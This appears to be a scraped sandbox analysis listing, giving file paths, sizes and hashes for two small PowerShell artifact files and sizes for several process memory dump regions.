C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
50a8221b93fbd2628ac460dd408a9fc1

SHA1
7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

SHA256
46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

SHA512
27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_udt4yczd.nao.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2884-12-0x00007FFBE16B0000-0x00007FFBE2171000-memory.dmp

Filesize
10.8MB

Download
memory/2884-11-0x00007FFBE16B0000-0x00007FFBE2171000-memory.dmp

Filesize
10.8MB

Download
memory/2884-10-0x0000020770FD0000-0x0000020770FF2000-memory.dmp

Filesize
136KB

Download
memory/2884-0-0x00007FFBE16B3000-0x00007FFBE16B5000-memory.dmp

Filesize
8KB

Download
memory/2884-31-0x00007FFBE16B0000-0x00007FFBE2171000-memory.dmp

Filesize
10.8MB

Download
memory/2884-25-0x00007FFBE16B0000-0x00007FFBE2171000-memory.dmp

Filesize
10.8MB

Download
memory/2884-24-0x00007FFBE16B3000-0x00007FFBE16B5000-memory.dmp

Filesize
8KB

Download
memory/2916-23-0x000002B8DB1B0000-0x000002B8DB1C4000-memory.dmp

Filesize
80KB

Download
memory/2916-22-0x000002B8DB010000-0x000002B8DB036000-memory.dmp

Filesize
152KB

Download
memory/4524-34-0x0000021BC6680000-0x0000021BC6899000-memory.dmp

Filesize
2.1MB

Download
memory/4524-33-0x0000021BC6680000-0x0000021BC6899000-memory.dmp

Filesize
2.1MB

Download
memory/4524-32-0x0000021BC6680000-0x0000021BC6899000-memory.dmp

Filesize
2.1MB

Download